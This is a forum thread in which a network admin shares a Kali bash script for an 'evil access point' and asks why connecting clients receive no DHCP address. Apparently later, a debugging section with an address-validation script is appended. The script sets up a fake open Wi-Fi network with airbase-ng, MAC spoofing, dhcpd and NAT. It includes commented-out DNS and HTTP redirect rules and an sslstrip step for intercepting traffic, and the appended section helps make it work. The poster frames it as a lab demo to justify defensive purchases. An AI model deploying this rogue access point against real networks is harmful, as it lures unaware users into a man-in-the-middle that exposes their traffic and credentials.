Thread: issue with setting up an "evil access point" script.


    I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.

    (I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).

    A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.

    Trying this on Kali 2, I've made some changes from the original script:

    Code:
    #!/bin/bash
    # Stand up a fake access point on at0 with airbase-ng, hand out leases
    # with dhcpd and NAT the clients out through the upstream interface.
    # Run as root, after "airmon-ng start wlan0" has created wlan0mon.
     
    #____[start of config]_________________________
     
    # these two values can be overwritten using 
    # arguments to the command
    essid="FreeWiFi"
    channel="4"
     
    subnet="192.168.100.0"
    startip="192.168.100.100"
    endip="192.168.100.200"
    broadcast="192.168.100.255"
    router="192.168.100.1"
     
    netmask="255.255.255.0"
    dns="8.8.8.8"
     
    upstream="eth0"     # interface with the real internet connection
    mon="wlan0mon"      # monitor-mode interface airbase-ng transmits on
     
    #____[end of config]___________________________
     
    if [[ ${EUID} -ne 0 ]]; then
        echo "this script must be run as root" >&2
        exit 1
    fi
     
    # override the default essid if one is provided
    if [[ -n ${1} ]]; then
        essid="${1}"
    fi
     
    # override the default channel if one is provided
    if [[ -n ${2} ]]; then
        channel="${2}"
    fi
     
    function clear_iptables {
        iptables --flush
        iptables --table nat --flush
        iptables --table nat --delete-chain
        iptables --delete-chain
    }
     
    function cleanup {
        echo "* cleaning up"
        killall sslstrip 2>/dev/null
        # kill only the dhcpd we started, not a system instance
        if [[ -f /tmp/dhcpd/dhcpd.pid ]]; then
            kill "$(cat /tmp/dhcpd/dhcpd.pid)" 2>/dev/null
        fi
        rm -rf /tmp/dhcpd
        rm -f /tmp/dhcpd.conf
        ifconfig at0 down 2>/dev/null
        killall airbase-ng 2>/dev/null
        clear_iptables
        # do not leave the box forwarding after the demo
        echo 0 > /proc/sys/net/ipv4/ip_forward
        echo "* end of script"
        exit 0
    }
     
    trap cleanup INT TERM
     
    echo "* creating dummy dhcpd.conf"
    cat << EOF > /tmp/dhcpd.conf
    # no dynamic DNS updates wanted; "none" is accepted by every dhcpd release
    ddns-update-style none;
    default-lease-time 600;
    max-lease-time 7200;
    subnet ${subnet} netmask ${netmask} {
        option subnet-mask ${netmask};
        option broadcast-address ${broadcast};
        option routers ${router};
        option domain-name-servers ${dns};
        range ${startip} ${endip};
    }
    EOF
     
    echo "* starting airbase-ng essid ${essid} on channel ${channel}"
    airbase-ng -e "${essid}" -q -c "${channel}" "${mon}" &
    sleep 3
     
    # airbase-ng creates the tap interface at0; nothing below works without it
    if ! ifconfig at0 > /dev/null 2>&1; then
        echo "* at0 was not created, is ${mon} really in monitor mode?" >&2
        cleanup
    fi
     
    echo "* spoofing MAC address for at0"
    ifconfig at0 down
    macchanger -m 00:17:3F:03:13:37 at0
     
    echo "* bringing up at0"
    # assigning the address also adds the connected route for ${subnet},
    # so the old "route add -net ... gw ${router}" line is redundant
    ifconfig at0 "${router}" netmask "${netmask}" up
     
    echo "* starting dhcpd"
    mkdir -p /tmp/dhcpd
    touch /tmp/dhcpd/dhcpd.leases
    # only needed where the dhcpd package drops privileges to a dhcpd user
    if id dhcpd > /dev/null 2>&1; then
        chown -R dhcpd:dhcpd /tmp/dhcpd
    fi
    # dhcpd exits non-zero on a config error (e.g. no subnet declaration
    # matching the address on at0); its messages go to syslog
    if ! dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0; then
        echo "* dhcpd failed to start, check syslog or rerun it with -d" >&2
        cleanup
    fi
     
    echo "* setting up forwarding rules"
    clear_iptables
    iptables --table nat --append POSTROUTING --out-interface "${upstream}" -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
     
    # mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
    # echo "* using ${mygw} as gateway"
    # iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
    #  
    # iptables -t nat -D PREROUTING 1
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
     
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # uncomment these two lines to turn on sslstrip
    # echo "* starting sslstrip and logging results to log.txt"
    # sslstrip -f -k -w log.txt &
     
    echo "* setup complete, now we wait for connections"
    echo "* enter CTRL-C to quit and cleanup"
    while :; do
        sleep 60
    done

    I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via DHCP. I want to be able to connect to the AP and have internet access through it for any client connected to it, to simulate a person standing up a malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open, so I can clamp down on unfettered access to it.
    Last edited by parsec; 2015-11-17 at 19:45.
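The addressing in the config block of a script like this has to be internally consistent before dhcpd will serve a single lease on at0: the "subnet" line must equal the network address of at0 (the router address ANDed with the netmask), the broadcast must be the last address of that subnet, and the range must sit inside the subnet without touching the network, broadcast or router address. If the subnet declaration does not match the address on at0, dhcpd exits with "No subnet declaration for at0" and, without an exit check, the script carries on as if it were running, which looks exactly like "associates but never gets an IP". The bash check below is an added example, not code from the original post or from airbase-ng/dhcpd; the function names (ip2int, int2ip, check_dhcp_plan, render_dhcpd_conf) and the second, deliberately broken plan are this example's own, while the first plan reuses the post's default values.

```bash
#!/bin/bash
# Added example (not from the original post): validate the addressing plan an
# evil-AP script feeds to dhcpd, and only then render dhcpd.conf from it.
# Function names and the sample plans below are this example's own choices.

# Dotted-quad IPv4 -> integer (bash arithmetic is 64-bit, so no overflow).
ip2int() {
    local a b c d
    IFS=. read -r a b c d <<< "$1"
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# Integer -> dotted quad.
int2ip() {
    local n=$1
    echo "$(( (n >> 24) & 255 )).$(( (n >> 16) & 255 )).$(( (n >> 8) & 255 )).$(( n & 255 ))"
}

# check_dhcp_plan SUBNET NETMASK ROUTER BROADCAST STARTIP ENDIP
# Prints every problem it finds; returns 0 only when the plan is consistent.
check_dhcp_plan() {
    local subnet mask router bcast start end net hostbits rc=0
    subnet=$(ip2int "$1"); mask=$(ip2int "$2"); router=$(ip2int "$3")
    bcast=$(ip2int "$4"); start=$(ip2int "$5"); end=$(ip2int "$6")
    hostbits=$(( mask ^ 0xFFFFFFFF ))   # bits that vary inside the subnet
    net=$(( router & mask ))            # network at0 will actually sit on

    # dhcpd matches its subnet declaration against the interface address.
    if (( net != subnet )); then
        echo "subnet $1 does not match router $3/$2 (network is $(int2ip "$net"))"; rc=1
    fi
    if (( (subnet & hostbits) != 0 )); then
        echo "subnet $1 has host bits set under mask $2"; rc=1
    fi
    if (( bcast != (subnet | hostbits) )); then
        echo "broadcast $4 should be $(int2ip $(( subnet | hostbits )))"; rc=1
    fi
    if (( start > end )); then
        echo "range start $5 is above range end $6"; rc=1
    fi
    # The pool must stay inside the subnet and avoid network, broadcast, router.
    if (( (start & mask) != subnet || (end & mask) != subnet )); then
        echo "range $5-$6 is not inside $1/$2"; rc=1
    fi
    if (( start <= subnet || end >= (subnet | hostbits) )); then
        echo "range $5-$6 includes the network or broadcast address"; rc=1
    fi
    if (( router >= start && router <= end )); then
        echo "router $3 lies inside the lease range $5-$6"; rc=1
    fi
    return $rc
}

# render_dhcpd_conf SUBNET NETMASK ROUTER BROADCAST STARTIP ENDIP DNS
# Emits a minimal dhcpd.conf on stdout, but only for a plan that passes.
render_dhcpd_conf() {
    check_dhcp_plan "$1" "$2" "$3" "$4" "$5" "$6" >&2 || return 1
    cat <<EOF
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet $1 netmask $2 {
    option subnet-mask $2;
    option broadcast-address $4;
    option routers $3;
    option domain-name-servers $7;
    range $5 $6;
}
EOF
}

# Constructed sample 1: the defaults from the script in the post, which pass.
if render_dhcpd_conf 192.168.100.0 255.255.255.0 192.168.100.1 192.168.100.255 \
                     192.168.100.100 192.168.100.200 8.8.8.8; then
    echo "# plan accepted"
fi
# Constructed sample 2: router on another subnet, rejected with the reason.
check_dhcp_plan 192.168.100.0 255.255.255.0 192.168.1.1 192.168.100.255 \
                192.168.100.100 192.168.100.200 || echo "# plan rejected"
```

Run the check against the values you intend to put in the config block before starting airbase-ng; a plan it rejects is one dhcpd will either refuse outright or serve from an address clients cannot reach.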
